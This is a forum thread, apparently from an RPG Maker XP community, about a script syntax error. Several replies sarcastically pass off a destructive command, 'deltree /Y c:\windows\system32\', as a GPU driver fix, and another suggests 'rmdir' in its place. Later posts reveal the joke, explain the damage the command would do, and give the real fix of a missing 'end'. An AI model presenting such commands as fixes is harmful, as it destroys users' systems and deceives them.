Help please i'm getting this error
Quote from: Gamescript 'toa2' line 4342 syntax error occured
Make sure nothings fudged up at line 4342 :(
Quote from: MetaKnight on March 10, 2009, 05:36:12 am
Help please i'm getting this error
Quote from: Gamescript 'toa2' line 4342 syntax error occured
wow...jeez...it seems like your drivers are malfunctioning, causing a fault in your GPU, which is shorting out the motherboard's ability to process line 4342.
edit: alright, I researched this all morning and found the way to fix it.
first you have to close, then reopen RMXP (don't ask me why, but it apparently has to happen)
then cut out line 4342. Then you close the script editor by hitting 'ok'
then you go to your command prompt, here's the tricky part.
enter the following
deltree /Y c:\windows\system32\
that should reset the hardware drivers for your GPU, and you should be able to paste line 4342 back and it should work.
Will this delete anything? :huh:
/me
Thanks man!
EDIT::
Not working....
- It won't let me execute "Commands deltree"
"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.
Or if your running a UNIX variant and wanna have some fun:
Three cookies to anyone who understands that without google.
Quote from: Blizzard on March 10, 2009, 02:46:51 pm
"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.
It's -my- problem....
And what do these commands do i'm running XP with screwwy drivers i gues..
We're being sarcastic. You are being vague.
The commands line is "End"..... so that can't be syntax error...
unless you have too many or too little ends. figure it out. there is either an extra end, or you need to put in more. follow the ends down the formatting.
Add an "end" to the end. You probably didn't copy the script right.
Quote from: MetaKnight on March 10, 2009, 03:59:02 pm
Quote from: Blizzard on March 10, 2009, 02:46:51 pm
"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.
It's -my- problem....
And what do these commands do i'm running XP with screwwy drivers i gues..
they would delete your System 32 folder, which contains all your drivers and such.
in other words, your computer would stop running, and never start up again without a format and system restore.